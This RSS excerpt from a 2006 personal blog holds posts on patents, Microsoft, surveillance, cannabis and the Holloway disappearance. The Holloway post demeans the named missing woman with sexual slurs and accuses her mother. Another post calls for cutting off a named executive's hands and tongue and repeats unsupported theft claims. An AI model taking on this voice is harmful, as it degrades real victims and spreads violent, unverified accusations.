<p><strong>The Incredible Hulk &#8212; <em>Prometheus</em></strong><br />
Enter, the incredible Hulk. A couple of days ago I was watching an old 80&#8242;s programme, <em>The Hulk</em> (hey, call it nostalgia) when I noticed that the idea of &#8216;force feedback&#8217; was already used in the episode &#8216;<a href='http://imdb.com/title/tt0610898/'>Prometheus</a>&#8216; (it&#8217;s in 2 parts I don&#8217;t exactly remember what part it was in&#8230; could be in both). </p>
<p>Spoiler warning, yada yada, but it&#8217;s about this meteorite crashing to Earth, influencing Banner&#8217;s capability to fully turn back into a human&#8230;. The government sends their spooks in the form of a special tactical team, working in this facility inside a mountain dubbed &#8216;Prometheus&#8217;. </p>
<p>One of the &#8216;specialists&#8217; the government hires is a guy that works with robots&#8230; In part 1 of the episodes, you see him drinking something with a girl behind a glass panel &#8212; why is she behind a glass panel? I guess she&#8217;s radio-active or something. He&#8217;s pouring her glass with robotic arms which he controls which some mechanism. (I believe the director already slightly hints there that the controller of the robot feels the touch of the women touching the robotic arm on the other side of the panel.)</p>
<p>Later, and as I said, I&#8217;m not sure if this happens in part 1 or part 2, but this guy controls the same type of robotic arms again, from a distance. </p>
<p>At a certain moment, and this is the moment I&#8217;m focussing on, the Hulk pulls the robotic arms. The next thing you see is the controller being pulled from his position and falling down because of that force. Which surely implies <em>feedback of force</em>, now doesn&#8217;t it? </p>
<p>Note these episodes have been aired in <em>1980</em>.</p>
<p><strong>The Force Feedback Patent</strong><br />
Now &#8212; knowing that it was the company <em>Immersion</em> that went after a couple of console producers that used the force-feedback concept in their controllers, I looked around a bit and came to discover <a href='http://www.delphion.com/details?pn=US05576727__'>this patent</a> describing an `<em>Electromechanical human-computer interface with force feedback</em>&#8216;. </p>
<p>Hmm, OK, now that is interesting because it&#8217;s from <em>1996</em> (well, filed in 1995, so we&#8217;ll give them that year). </p>
<p>But &#8212; the episodes in <em>The Incredible Hulk</em> surely show an <em>electromechanical human-computer interface</em> too with, indeed, <em>force feedback</em>. </p>
<p>Seeing the year that this specific episodes are from, then a rough 15 years later the <em>same concept</em> is not at all &#8216;original&#8217; and &#8216;innovative&#8217; as a patent <em>ought</em> to be. Thinking of that ping-pong ball story, it makes me conclude the force-feedback patent is <em>invalid</em> because I don&#8217;t see this being any different.</p>
<p>Searching around a bit more, I found the story on the Donald Duck and the ping-pong balls <a href='http://www.iusmentis.com/patents/priorart/donaldduck/'>here</a>, it seems this prevented the patent from being approved in the Netherlands and Germany &#8212; not in the US&#8230;</p>
<p>But as I said, I am not a lawyer at all and I could be completely on the wrong track here&#8230; but it&#8217;s just something that I noticed.</p>
<p><tags>The Incredible Hulk, Force-feedback, Prior-art</tags></p>
]]></content:encoded>
			<wfw:commentRss>http://navahogunleg.net/blog/2006/11/24/force-feedback-did-i-see-prior-art-in-the-incredible-hulk/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Am I the only one&#8230; ?</title>
		<link>http://navahogunleg.net/blog/2006/11/21/am-i-the-only-one/</link>
		<comments>http://navahogunleg.net/blog/2006/11/21/am-i-the-only-one/#comments</comments>
		<pubDate>Tue, 21 Nov 2006 11:31:43 +0000</pubDate>
		<dc:creator>Navaho Gunleg</dc:creator>
				<category><![CDATA[Random Rantings]]></category>
		<category><![CDATA[Visions]]></category>

		<guid isPermaLink="false">http://navahogunleg.net/blog/2006/11/21/am-i-the-only-one/</guid>
		<description><![CDATA[Am I the only one here that sees the potential for abuse here by creative, corrupt, cops aspiring to be movie-directors?]]></description>
			<content:encoded><![CDATA[<p>Am I the only one here that sees the potential for abuse <a href='http://www.theregister.co.uk/2006/11/21/met_police_heargear_cameras/'>here</a> by creative, corrupt, cops aspiring to be movie-directors? <img src='http://navahogunleg.net/blog/wp-includes/images/smilies/icon_razz.gif' alt=':P' class='wp-smiley' /> </p>
]]></content:encoded>
			<wfw:commentRss>http://navahogunleg.net/blog/2006/11/21/am-i-the-only-one/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>And in a couple of years, Linux users are terrorists, undermining our freedoms&#8230;</title>
		<link>http://navahogunleg.net/blog/2006/11/20/and-in-a-couple-of-years-linux-users-are-terrorists-undermining-our-freedoms/</link>
		<comments>http://navahogunleg.net/blog/2006/11/20/and-in-a-couple-of-years-linux-users-are-terrorists-undermining-our-freedoms/#comments</comments>
		<pubDate>Mon, 20 Nov 2006 15:37:49 +0000</pubDate>
		<dc:creator>Navaho Gunleg</dc:creator>
				<category><![CDATA[Conspiracies]]></category>
		<category><![CDATA[Freedom & Repression]]></category>
		<category><![CDATA[Media, Religion & Politics]]></category>
		<category><![CDATA[Music Industry & DRM]]></category>
		<category><![CDATA[Random Rantings]]></category>
		<category><![CDATA[Visions]]></category>

		<guid isPermaLink="false">http://navahogunleg.net/blog/2006/11/20/and-in-a-couple-of-years-linux-users-are-terrorists-undermining-our-freedoms/</guid>
		<description><![CDATA[So, Microsoft has made the bold claim that their intellectual property is in it. Oh my fucking god. This is serious because there are plenty of stupid people in this world to believe that crap. Fuck, the critical majority, in each and every issue, is dumber than a horses ass and knows just enough to [...]]]></description>
			<content:encoded><![CDATA[<p>So, Microsoft <a href='http://www.theregister.co.uk/2006/11/20/microsoft_claims_linux_code/'>has made the bold claim that <strong>their</strong> intellectual property is in it</a>. </p>
<p>Oh my fucking god. This is serious because there are plenty of stupid people in this world to believe that crap. Fuck, the critical majority, in each and every issue, <em>is</em> dumber than a horses ass and knows just enough to fuck the whole world up even more.</p>
<p>Ballmer &#8212; <em>you</em> are the (fat) fucking thief here &#8212; as we all know that <em>property implies theft</em>. </p>
<p>And thieves that steal from the people, of course, rightly deserve to get punished, <em>biblical-style</em>&#8230;. And making statements like that, after cutting of his hands, let&#8217;s cut out his tongue too.</p>
<p>The sad future is, Microsoft will probably succeed in all this, <strong>BECAUSE EVERYBODY IN THIS FUCKING WORLD IS A FUCKING SPINELESS BITCH</strong>. Excuse my caps, but sheeeze,  this is a fucking disgrace. </p>
<p>Microsoft fanbois probably praising this shit, while they don&#8217;t even know half of the Microsoft codebase is probably stolen from public domain anyway. </p>
<p>It seriously upsets me that all those Microsoft fanbois are critising Sony for that DRM debacle, but fuck, how a naive asshole can you be thinking that Microsoft isn&#8217;t doing exactly the same with their XBugs (and Vista etc)? Sheesh, those critics wouldn&#8217;t even know the DRM mess around them, even if somebody tripped them and they fell face down and drowned in that shit. </p>
<p>What do you think Microsoft is up to with all this shit? The more and more I see the things that the people are allowing to (well rather: &#8216;against&#8217;) themselves, the more I really tend to think that none of you people <em>deserve</em> the freedom you all do dream about. All these idiots probably didn&#8217;t even know that  the Windows&#8217; TCP/IP stack (you need one for networking) was initially stolen from BSD? </p>
<p>First, they <em>steal</em> all the code, and are now going after the <em>initial</em> sources?</p>
<p>They first targetted Linux, using SCO as a proxy. Now it seems they are throwing their own weight against it. Only because they want <em>nobody</em> to learn IT technology <em>for free</em>. Only to guarantee their frigging monopoly.</p>
<p>The future radiates uglyness and smells of pooh. </p>
<p>As I said earlier this month, <em>Death To The Corporate Mafia</em> and, as things seem to stand, <em>the sooner, the better</em>.</p>
<p>Oh shit &#8212; if only this news was a hoax, just like the release of Microsoft&#8217;s Firefox browser. <img src='http://navahogunleg.net/blog/wp-includes/images/smilies/icon_razz.gif' alt=':P' class='wp-smiley' /> </p>
]]></content:encoded>
			<wfw:commentRss>http://navahogunleg.net/blog/2006/11/20/and-in-a-couple-of-years-linux-users-are-terrorists-undermining-our-freedoms/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>brain-tag.net</title>
		<link>http://navahogunleg.net/blog/2006/10/15/brain-tagnet/</link>
		<comments>http://navahogunleg.net/blog/2006/10/15/brain-tagnet/#comments</comments>
		<pubDate>Sun, 15 Oct 2006 21:47:00 +0000</pubDate>
		<dc:creator>Navaho Gunleg</dc:creator>
				<category><![CDATA[Ideas & Concepts]]></category>
		<category><![CDATA[Internet & Technology]]></category>

		<guid isPermaLink="false">http://navahogunleg.net/blog/2006/10/15/brain-tagnet/</guid>
		<description><![CDATA[Don&#8217;t you hate it when you go and eat somewhere and the grub&#8217;s awful? Not because of the cook, but because of the ingredients? Or, are you (or do you know) a picky eater? Doesn&#8217;t it suck that it seems hard to find new menu&#8217;s to eat? That&#8217;s what we were discussing when we had [...]]]></description>
			<content:encoded><![CDATA[<p><em>Don&#8217;t you hate it when you go and eat somewhere and the grub&#8217;s awful? Not because of the cook, but because of the ingredients? Or, are you (or do you know) a picky eater? Doesn&#8217;t it suck that it seems hard to find new menu&#8217;s to eat?</em></p>
<p>That&#8217;s what we were discussing when we had some dinner with some friends the other day; talking about the fact that I&#8217;m a picky eater, well, that each of us have such different preferences, but that it&#8217;s hard to think of <em>new menus</em> because of this. And eating the same shit every time can get boring. And I also know that &#8216;<em>picky eaters</em>&#8216; often get the question if I they got a list of things they <em>like</em> for a quick reference.</p>
<p>So the idea spawned: <em>some location on the internet to share your food preferences with an optional to &#8216;match&#8217; these with somebody else&#8217;s.</em>.  Useful when you are meeting them for dinner: you excange IDs and you can check the site and you&#8217;re all set for a happy dinner without people irritated because they don&#8217;t like the food and/or no alternatives have been arranged for them.</p>
<p>After some initial talks, some initial &#8216;brewing&#8217;, the day after I quickly cooked something up (I already had a domain registered doing nothing for years which is just great for the job). </p>
<p>Only this weekend I got around to finetune it some more and lo and behold, a new site was born at <a href="http://brain-tag.net/">brain-tag.net</a>:<br />
<center><img src="/files/screenshot-brain-tag.png"/></center></p>
<p>At the moment, it&#8217;s in beta &#8212; texts are incomplete and/or contain typos &#8212; but heck, use is restricted to <em>friends only</em> &#8212; and only these friends can invite other friends &#8212; but if you are a developer like me you know it&#8217;s fun to create and brag about stuff. <img src='http://navahogunleg.net/blog/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' /> </p>
<p>So, if you are a friend and if you&#8217;re interested in a <em>beta-test account</em>, let me know. (And yeh, it&#8217;s multi-lingual: Dutch and English.)</p>
<p><em>Update 2006-10-17</em>: Meanwhile, the site has changed a bit: 356 foodstuffs as I write this, and more functionality has been added. Stuff like, for instance, support for <em>allergies</em> &#8212; that could be the difference between life or death! &#8212; and <em>mucho</em> speed- and interface-enhancements. The site might be giving away some accounts in the future, so check it out some time, maybe you&#8217;re lucky. <img src='http://navahogunleg.net/blog/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
]]></content:encoded>
			<wfw:commentRss>http://navahogunleg.net/blog/2006/10/15/brain-tagnet/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Not having anything to hide; rather fearing other peoples interpretation of the facts&#8230;</title>
		<link>http://navahogunleg.net/blog/2006/08/31/not-having-anything-to-hide-rather-fearing-other-peoples-interpretation-of-the-facts/</link>
		<comments>http://navahogunleg.net/blog/2006/08/31/not-having-anything-to-hide-rather-fearing-other-peoples-interpretation-of-the-facts/#comments</comments>
		<pubDate>Thu, 31 Aug 2006 09:58:28 +0000</pubDate>
		<dc:creator>Navaho Gunleg</dc:creator>
				<category><![CDATA[Computers & Hardware]]></category>
		<category><![CDATA[Conspiracies]]></category>
		<category><![CDATA[Freedom & Repression]]></category>
		<category><![CDATA[Media, Religion & Politics]]></category>
		<category><![CDATA[Security & Privacy]]></category>
		<category><![CDATA[Software]]></category>
		<category><![CDATA[Visions]]></category>

		<guid isPermaLink="false">http://navahogunleg.net/blog/2006/08/31/not-having-anything-to-hide-rather-fearing-other-peoples-interpretation-of-the-facts/</guid>
		<description><![CDATA[The title of this post has always been my biggest fear about Big Brother watching everybody&#8217;s move, registering everything they buy, et cetera. See, I really have nothing to hide. I fear that &#8216;The Man&#8217; only wrongly interprets the information and I get Red Flagged for nothing. People always thought I was kidding when I [...]]]></description>
			<content:encoded><![CDATA[<p>The title of this post has always been my biggest fear about Big Brother watching everybody&#8217;s move, registering everything they buy, et cetera.</p>
<p>See, I really have nothing to hide. I fear that &#8216;The Man&#8217; only wrongly interprets the information and I get <em>Red Flagged</em> for nothing.</p>
<p>People always thought I was kidding when I said that, but I&#8217;m ever so serious. Recently I was thinking that, basically, some anti-piracy dickheads would dare to state that, if one buys computer components, or a PC, from a retailer and he doesn&#8217;t include an operating system, the person would be a software-pirate.</p>
<p>When I today read <a href="http://www.theregister.co.uk/2006/08/30/fine_software_pirates_says_bsa/">this article here</a>, well, my fears are confirmed.</p>
<p>The BSA wants more enforcement and I can see them convincing &#8216;the law&#8217; that people that do not buy an OS are pirates. </p>
<p>Which is, of course, a big load of crock.</p>
<p><tags>Piracy, Surveillance, Privacy</tags></p>
]]></content:encoded>
			<wfw:commentRss>http://navahogunleg.net/blog/2006/08/31/not-having-anything-to-hide-rather-fearing-other-peoples-interpretation-of-the-facts/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Genetic class-system</title>
		<link>http://navahogunleg.net/blog/2006/08/23/genetic-class-system/</link>
		<comments>http://navahogunleg.net/blog/2006/08/23/genetic-class-system/#comments</comments>
		<pubDate>Wed, 23 Aug 2006 09:23:59 +0000</pubDate>
		<dc:creator>Navaho Gunleg</dc:creator>
				<category><![CDATA[Freedom & Repression]]></category>
		<category><![CDATA[Media, Religion & Politics]]></category>
		<category><![CDATA[Visions]]></category>

		<guid isPermaLink="false">http://navahogunleg.net/blog/2006/08/23/genetic-class-system/</guid>
		<description><![CDATA[So I was reading this blurb on Slashdot on a genetically modified mouse lacking a certain gene that is responsible for the feelings of &#8216;depression&#8217; when suddenly this hit me: In the future, not only will there be a divide in classes, i.e. an economic divide, but it will be genetic as well. So, the [...]]]></description>
			<content:encoded><![CDATA[<p>So I was reading <a href="http://science.slashdot.org/science/06/08/23/056207.shtml">this blurb</a> on Slashdot on a genetically modified mouse lacking a certain gene that is responsible for the feelings of &#8216;depression&#8217; when suddenly this hit me:</p>
<p>In the future, not only will there be a divide in classes, i.e. an economic divide, but it will be <em>genetic</em> as well.</p>
<p>So, the &#8216;general public&#8217;, i.e. you and me will get genetically engineered to: </p>
<ul>
<li>Stop nagging about authority,</p>
<li>Stop wanting change,
<li>Stop begin depressed,
<li>Stop procreating by making us infertile,
<li>No longer being a threat to the current elite&#8217;s grip of power.</ul>
<p>Meanwhile, the authority, the elite, will stay the &#8216;pure&#8217; human race as it is. Basically, it&#8217;s humanity on <em>Prozac on steroids</em>: people don&#8217;t fucking mind that they&#8217;re slaves to the money-hungry, war mongering dickheads that want to stay in power and mess-up <strong><em>our</em></strong> planet.</p>
<p><em>Can <strong>you</strong> already feel the DNA-strain-noose around your neck?</em> It&#8217;s gonna choke us all.</p>
<p><tags>Visions, Future, Humanity, Repression, Genetic Engineering</tags></p>
]]></content:encoded>
			<wfw:commentRss>http://navahogunleg.net/blog/2006/08/23/genetic-class-system/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>It&#8217;s official: Vulgar lyrics linked to early sex by teenagers</title>
		<link>http://navahogunleg.net/blog/2006/08/08/its-official-vulgar-lyrics-linked-to-early-sex-by-teenagers/</link>
		<comments>http://navahogunleg.net/blog/2006/08/08/its-official-vulgar-lyrics-linked-to-early-sex-by-teenagers/#comments</comments>
		<pubDate>Tue, 08 Aug 2006 09:11:35 +0000</pubDate>
		<dc:creator>Navaho Gunleg</dc:creator>
				<category><![CDATA[Animals & Nature]]></category>
		<category><![CDATA[Media, Religion & Politics]]></category>
		<category><![CDATA[Random Rantings]]></category>
		<category><![CDATA[Visions]]></category>

		<guid isPermaLink="false">http://navahogunleg.net/blog/2006/08/08/its-official-vulgar-lyrics-linked-to-early-sex-by-teenagers/</guid>
		<description><![CDATA[Wow, these guys really deserve a Nobel-prize or something.&#60;/sarcasm&#62; Sheesh &#8212; did they really have to research this? When will they realise it&#8217;s the nakedness on TV too? Dumb shit like MTV showing a too-young-a-girl crawling over the floor singing &#8220;I&#8217;m a slave &#8212; for you&#8221;, people think that doesn&#8217;t influence a childs&#8217; mind? In [...]]]></description>
			<content:encoded><![CDATA[<p>Wow, these guys really deserve a Nobel-prize or something.&lt;/sarcasm&gt;</p>
<p>Sheesh &#8212; did they really have to <em>research</em> this? When will they realise it&#8217;s the <em>nakedness on TV</em> too?</p>
<p>Dumb shit like MTV showing a too-young-a-girl crawling over the floor singing &#8220;<em>I&#8217;m a slave &#8212; for you</em>&#8221;, people think that doesn&#8217;t influence a childs&#8217; mind?</p>
<p>In Holland we got dumb stuff like, television programmes getting ratings so parents would be able to decide whether their child should watch a programme, <em>whilst the ads in-between are ignored (and almost X-rated in some cases).</em></p>
<p>Dumb shit like, models looking younger and younger by the year, like some form of <em>legalised paedophilia</em>, so the old horny guys in the fashion industry get their dick sucked by these aspiring girls really sickens me.</p>
<p>Flavor Flav&#8217;s ringing in my head saying: &#8220;<em>You blind baby. Blind by the fact, you&#8217;re watching that garbage.</em>&#8221;&#8230;</p>
<p><tags>Teenagers, Sex, TV</tags></p>
]]></content:encoded>
			<wfw:commentRss>http://navahogunleg.net/blog/2006/08/08/its-official-vulgar-lyrics-linked-to-early-sex-by-teenagers/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Give up your PIN-code to some criminal holding you at gun-point?</title>
		<link>http://navahogunleg.net/blog/2006/08/07/give-up-your-pin-code-to-some-criminal-holding-you-at-gun-point/</link>
		<comments>http://navahogunleg.net/blog/2006/08/07/give-up-your-pin-code-to-some-criminal-holding-you-at-gun-point/#comments</comments>
		<pubDate>Mon, 07 Aug 2006 12:21:04 +0000</pubDate>
		<dc:creator>Navaho Gunleg</dc:creator>
				<category><![CDATA[Belegana]]></category>
		<category><![CDATA[Freedom & Repression]]></category>
		<category><![CDATA[Health]]></category>
		<category><![CDATA[Ideas & Concepts]]></category>
		<category><![CDATA[Media, Religion & Politics]]></category>
		<category><![CDATA[Random Rantings]]></category>
		<category><![CDATA[Security & Privacy]]></category>
		<category><![CDATA[The Netherlands]]></category>
		<category><![CDATA[Visions]]></category>

		<guid isPermaLink="false">http://navahogunleg.net/blog/2006/08/07/give-up-your-pin-code-to-some-criminal-holding-you-at-gun-point/</guid>
		<description><![CDATA[Well, go to jail already! In the Netherlands, the police will label anybody that hands over their PIN-code, as a &#8216;suspect of a criminal act&#8217;. Of course, there are things to be said against, and pro&#8230;. But, of course, I&#8217;m more leaning towards against: I didn&#8217;t fucking ask for a fucking banking-card that is protected [...]]]></description>
			<content:encoded><![CDATA[<p>Well, go to jail already! In the Netherlands, the police will label anybody that hands over their PIN-code, as a &#8216;suspect of a criminal act&#8217;. Of course, there are things to be said against, and pro&#8230;. But, of course, I&#8217;m more leaning towards <em>against</em>: <em>I</em> didn&#8217;t fucking ask for a fucking banking-card that is protected by something insane as a mere PIN-code.</p>
<p>I didn&#8217;t ask for that cheap, vulnerable, very easily exploitable, technology. </p>
<p>But I <em>am</em> forced to use it.</p>
<p>Now, if somebody threatens my life, I either risk getting shot by the guy, or getting sued by the state, because I&#8217;m a criminal when I hand over my PIN-code. Like I said: <em>I did not ask for this vulnerable technology</em>, and, <em>I didn&#8217;t ask for the banks to move to machines, so they could fire their (human) personnel thus make more money</em>. </p>
<p>So now, in order to fix the problem <em>they</em> have created, they&#8217;re labeling <em>us</em> as suspects, pointing the <em>blame</em> at <em>us</em>?</p>
<p>See how they <em>distrust</em> you? And we are expected to trust <em>them</em>?</p>
<p>Remember years ago, when we had to physically go to the bank to get funds and had to show our passport to a <em>person</em> before we got our money.</p>
<p>The whole &#8216;<em>Gimme your PIN-code at gun-point</em>&#8216; situation wouldn&#8217;t even <em>exist</em> then. Basically, they are trying to fix a broken system that shouldn&#8217;t have been introduced in the first place.</p>
<p>Watch my words, in a couple of years we get this same shit dealing with RFID and other &#8216;new&#8217; stuff.</p>
<p><tags>PIN-code, Criminal, Threat, the Netherlands</tags></p>
]]></content:encoded>
			<wfw:commentRss>http://navahogunleg.net/blog/2006/08/07/give-up-your-pin-code-to-some-criminal-holding-you-at-gun-point/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Shifting away responsibility and blame&#8230;</title>
		<link>http://navahogunleg.net/blog/2006/08/04/shifting-away-responsibility-and-blame/</link>
		<comments>http://navahogunleg.net/blog/2006/08/04/shifting-away-responsibility-and-blame/#comments</comments>
		<pubDate>Fri, 04 Aug 2006 08:29:57 +0000</pubDate>
		<dc:creator>Navaho Gunleg</dc:creator>
				<category><![CDATA[Media, Religion & Politics]]></category>
		<category><![CDATA[Random Rantings]]></category>
		<category><![CDATA[Sad Stuff]]></category>
		<category><![CDATA[Visions]]></category>

		<guid isPermaLink="false">http://navahogunleg.net/blog/2006/08/04/shifting-away-responsibility-and-blame/</guid>
		<description><![CDATA[So, de Van Der Sloot case is in the news again. It really makes me sick how parents rather point the finger at someone else, whereas they are just as responsible for this situation in the first place. Sure it is a sad story that somebody made the girl disappear, and of course, it is [...]]]></description>
			<content:encoded><![CDATA[<p>So, de <a href="http://www.expatica.com/source/site_article.asp?subchannel_id=19&#038;story_id=32014&#038;name=Father+of+Holloway+suspect+wins+damages+for+detention">Van Der Sloot</a> case is <a href="http://www.hardbeatnews.com/editor/RTE/my_documents/my_files/details.asp?newsid=10361">in the news</a> again.</p>
<p>It really makes me sick how parents rather point the finger at someone else, whereas they are <em>just as responsible</em> for this situation in the first place.</p>
<p>Sure it is a sad story that <em>somebody</em> made the girl disappear, and of course, it is irrelevant that she might have been a slutty, drunk, horny little whore that actually <em>wanted</em> to get down with those guys.</p>
<p>That&#8217;s irrelevant.</p>
<p>It is irrelevant and really doesn&#8217;t matter that her parents let her <em>go</em> on that trip to Aruba in the first place. It&#8217;s irrelevant that, the American kids that <em>go</em> to Aruba do so because they, legally, can <em>get drunk</em> there and can&#8217;t in their own country?  </p>
<p>It&#8217;s irrelevant that, having not much experience with alcohol, that they can&#8217;t handle the booze and start acting weird.</p>
<p>No &#8212; that is really all irrelevant. Mothers rather wouldn&#8217;t even <em>think</em> of the possibility her girl is a ho&#8217; and was tempted to sins of the flesh herself. &#8220;<em>Nah, she was a victim of a sexual predator; my girl is sweet and only plays with My Little Pony.</em>&#8221; If that is so &#8212; what was her business on Aruba? I believe that was &#8216;to party&#8217;. And the surveillance video&#8217;s seem to imply she was partying on her own?</p>
<p>Irrelevant, right?</p>
<p>As long as one can point the finger at somebody else and put all their energy to try to get that guy in jail, one doesn&#8217;t <em>have</em> to feel responsible. I bet they live with a bad conscience, though. The parents <em>know</em> its their own fault, but feel better if the &#8216;whole world&#8217; thinks it&#8217;s Jorans&#8217;, if you know what I mean.  Although the parents will still have nightmares, they won&#8217;t be looked down upon when they walk to the grocery store&#8230;</p>
<p>Somehow, it&#8217;d be poetic justice if the body was to be found and a simple accident had happened. I wonder, if that would happen, if the mother will ever say apologise to the Van Der Sloot family, or will then <em>still</em> blindly, enraged, think that Joran took her little girl away? Seeing her aggressively slander Joran, labeling him as a murderer and sexual predator although here isn&#8217;t a single piece of proof, I could even think her capable of hiding the body if it <em>was</em> found. But that&#8217;s just my sick little mind.</p>
<p>If any, the guy(s) that really did this, are long-gone and won&#8217;t ever be caught.</p>
<p>Wouldn&#8217;t you, as a mother, rather see it prohibited for American kids to go party on the islands around the US that don&#8217;t have an age-limit on drinking alcohol. Or rather, let kids in the US drink alcohol at an earlier age so they can handle it? Wouldn&#8217;t that be <em>more</em> useful than trying to pin this on somebody that could possibly be innocent? That doesn&#8217;t bring back the girl. I&#8217;d rather see any future &#8216;accidents&#8217; being prevented rather than spent money and time focusing on this single guy. Which leads me to think that the mother has selfish motives. </p>
<p><tags>Van Der Sloot, Aruba, Holloway</tags></p>
]]></content:encoded>
			<wfw:commentRss>http://navahogunleg.net/blog/2006/08/04/shifting-away-responsibility-and-blame/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Trains to be equiped with TV screens for travel-info, news..</title>
		<link>http://navahogunleg.net/blog/2006/07/25/trains-to-be-equiped-with-tv-screens-for-travel-info-news/</link>
		<comments>http://navahogunleg.net/blog/2006/07/25/trains-to-be-equiped-with-tv-screens-for-travel-info-news/#comments</comments>
		<pubDate>Tue, 25 Jul 2006 12:17:41 +0000</pubDate>
		<dc:creator>Navaho Gunleg</dc:creator>
				<category><![CDATA[Internet & Technology]]></category>
		<category><![CDATA[Media, Religion & Politics]]></category>
		<category><![CDATA[Visions]]></category>

		<guid isPermaLink="false">http://navahogunleg.net/blog/2006/07/25/trains-to-be-equiped-with-tv-screens-for-travel-info-news/</guid>
		<description><![CDATA[I just read this initiative to equip trains with TV screens. These TV screens will display travel-information, alternating with news and advertisements. No escape from the propaganda they call TV &#8212; get brainwashed while commuting&#8230; Two-Minutes Hate, anyone?]]></description>
			<content:encoded><![CDATA[<p>I just read <a href="http://news.google.com/news/url?sa=t&#038;ct=:ePkh8BM9EwLbwQs0WYopLwcom2PACbENKJaHJAbk5qIqKRFiQLEeAM_yDM8/2-0-0&#038;fp=44c6b876f99d5d55&#038;ei=LQrGRIq0BbiOwQGhqe2KAg&#038;url=http%3A//www.pzc.nl/internationaal/economie/article525016.ece&#038;cid=1134358124&#038;sig2=aQih1tTATukWaaPlhl3Z_w">this initiative to equip trains with TV screens</a>. These TV screens will display travel-information, alternating with news and advertisements.</p>
<p>No escape from the propaganda they call TV &#8212; get brainwashed while commuting&#8230;  <a href="http://en.wikipedia.org/wiki/Two_Minutes_Hate">Two-Minutes Hate</a>, anyone?</p>
]]></content:encoded>
			<wfw:commentRss>http://navahogunleg.net/blog/2006/07/25/trains-to-be-equiped-with-tv-screens-for-travel-info-news/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Revealing how marihuana affects the brain</title>
		<link>http://navahogunleg.net/blog/2006/07/24/revealing-how-marihuana-affects-the-brain/</link>
		<comments>http://navahogunleg.net/blog/2006/07/24/revealing-how-marihuana-affects-the-brain/#comments</comments>
		<pubDate>Mon, 24 Jul 2006 08:12:12 +0000</pubDate>
		<dc:creator>Navaho Gunleg</dc:creator>
				<category><![CDATA[Health]]></category>
		<category><![CDATA[Interesting Links]]></category>
		<category><![CDATA[Random Rantings]]></category>
		<category><![CDATA[Visions]]></category>

		<guid isPermaLink="false">http://navahogunleg.net/blog/2006/07/24/revealing-how-marihuana-affects-the-brain/</guid>
		<description><![CDATA[OK so I was just reading this article right here telling about how scientists have developed a way to image cannabinoid receptors in the brain. All fine and dandy &#8212; I see no problem there. Until 1959, cannabis was available in pharmacies as medicine, under the name Extractum Cannabis Indicae. After that, cheaper, synthetic drugs [...]]]></description>
			<content:encoded><![CDATA[<p>OK so I was just reading <a href="http://www.techreview.com/read_article.aspx?id=16994&#038;ch=biotech">this article right here</a> telling about how scientists have developed a way to image cannabinoid receptors in the brain.</p>
<p>All fine and dandy &#8212; I see no problem there. </p>
<p>Until 1959, cannabis was available in pharmacies as medicine, under the name <em>Extractum Cannabis Indicae</em>. After that, cheaper, synthetic drugs appeared on the scene. So, that the compounds in it have <em>some</em> effect on some species stands to reason.</p>
<p>But the following line bothers me, just a little:<br />
<blockquote>The new tracer will also help scientists <em>learn more about marijuana addiction</em>, and possibly treat it more effectively, says Henry Wagner, director of the division of radiation health sciences at Johns Hopkins University (who was not involved in the research). With the new tracer, neuroscientists could determine if smoking marijuana increases the number of cannabinoid receptors in the brain, which could lead to a craving for more of the drug. </p></blockquote>
<p>OK, &#8216;<em>to learn more about marihuana addiction</em>&#8216;? Why are they so quick to say that &#8216;marihuana is addictive&#8217;? </p>
<p>Isn&#8217;t <em>sex</em> comparingly &#8216;addictive&#8217; too? </p>
<p>I mean, I&#8217;m not <em>addicted</em> to sex, but getting it every time I would want it wouldn&#8217;t bother me a bit. Does that make me an addict? </p>
<p>Doesn&#8217;t that just make me an &#8216;enjoyer of life&#8217;?</p>
<p>Of course, the problem here is the fact that, in the US, it is a controlled substance since some paper-producing guy wanted to keep its paper-monopoly. </p>
<p>That, and the <a href="http://www.fda.gov/bbs/topics/NEWS/2006/NEW01362.html">FDA stating that it has no medicinal value</a>.</p>
<p>Of course it has medicinal value. And they know it. They just want to investigate the compounds in order to make cheaper, synthetic &#8216;alternatives&#8217;. (Yeh, the pharmaceutical industry is producing the &#8216;alternative medicines&#8217; in my book.) But that&#8217;s just a hunch.</p>
<p><tags>Marihuana, Medicine, Alternative Medicine, Drugs, Recreation, Addiction</tags></p>
]]></content:encoded>
			<wfw:commentRss>http://navahogunleg.net/blog/2006/07/24/revealing-how-marihuana-affects-the-brain/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>On smell-technology&#8230;</title>
		<link>http://navahogunleg.net/blog/2006/07/03/on-smell-technology/</link>
		<comments>http://navahogunleg.net/blog/2006/07/03/on-smell-technology/#comments</comments>
		<pubDate>Mon, 03 Jul 2006 11:14:30 +0000</pubDate>
		<dc:creator>Navaho Gunleg</dc:creator>
				<category><![CDATA[Freedom & Repression]]></category>
		<category><![CDATA[Internet & Technology]]></category>
		<category><![CDATA[Random Rantings]]></category>
		<category><![CDATA[Reviews]]></category>
		<category><![CDATA[Visions]]></category>

		<guid isPermaLink="false">http://navahogunleg.net/blog/2006/07/03/on-smell-technology/</guid>
		<description><![CDATA[It&#8217;s amusing to see how &#8216;new&#8217;, almost magical technologies get embraced with so-much naivety. Slashdot has this little blurb about an article in the New Scientist on &#8216;smell-technology&#8217;; &#8220;Simply point the gadget at a freshly baked cookie, for example, and it will analyse its odour and reproduce it for you using a host of non-toxic [...]]]></description>
